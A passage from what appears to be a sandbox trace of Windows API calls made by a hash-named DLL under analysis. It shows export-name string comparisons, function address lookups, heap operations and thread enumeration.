lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0179.347] CloseHandle (hObject=0x17c) returned 1 [0179.347] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0179.347] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0179.347] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0179.347] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0179.347] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0179.347] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0179.347] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0179.347] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0179.347] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0179.347] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0179.347] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0179.347] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0179.348] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0179.348] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0179.348] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0179.348] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0179.348] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0179.348] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0179.348] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0179.348] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0179.348] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0179.348] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0179.348] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0179.348] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0179.348] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0179.348] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0179.348] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0179.348] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0179.348] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0179.349] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0179.349] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0179.349] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0179.349] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0179.349] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0179.349] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0179.349] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0179.350] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0179.350] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0179.350] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0179.350] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0179.350] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0179.350] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0179.351] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0179.351] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0179.352] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0179.352] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0179.353] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0179.353] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0179.353] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0179.353] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0179.353] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.354] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0179.355] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0179.356] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0179.356] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0179.356] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0179.356] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0179.356] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0179.357] GetProcessHeap () returned 0x580000 [0179.357] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2cf5030 | out: hHeap=0x580000) returned 1 [0179.499] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0179.499] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0179.500] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1000) returned 0x2cf5030 [0179.502] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x24) returned 0x588660 [0179.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_destroy_codec", cchWideChar=-1, lpMultiByteStr=0x588660, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_destroy_codec", lpUsedDefaultChar=0x0) returned 18 [0179.502] GetLastError () returned 0x0 [0179.502] SetLastError (dwErrCode=0x0) [0179.502] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_destroy_codecW") returned 0x0 [0179.502] GetLastError () returned 0x7f [0179.502] SetLastError (dwErrCode=0x7f) [0179.502] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_destroy_codecA") returned 0x0 [0179.502] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_destroy_codec") returned 0x7ffc45f19a10 [0179.503] GetActiveWindow () returned 0x0 [0179.503] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2cf5030 | out: hHeap=0x580000) returned 1 [0179.503] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x588660 | out: hHeap=0x580000) returned 1 [0179.503] GetCurrentProcessId () returned 0x1280 [0179.503] GetCurrentThreadId () returned 0xd28 [0179.503] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0179.526] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.676] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.683] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0179.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 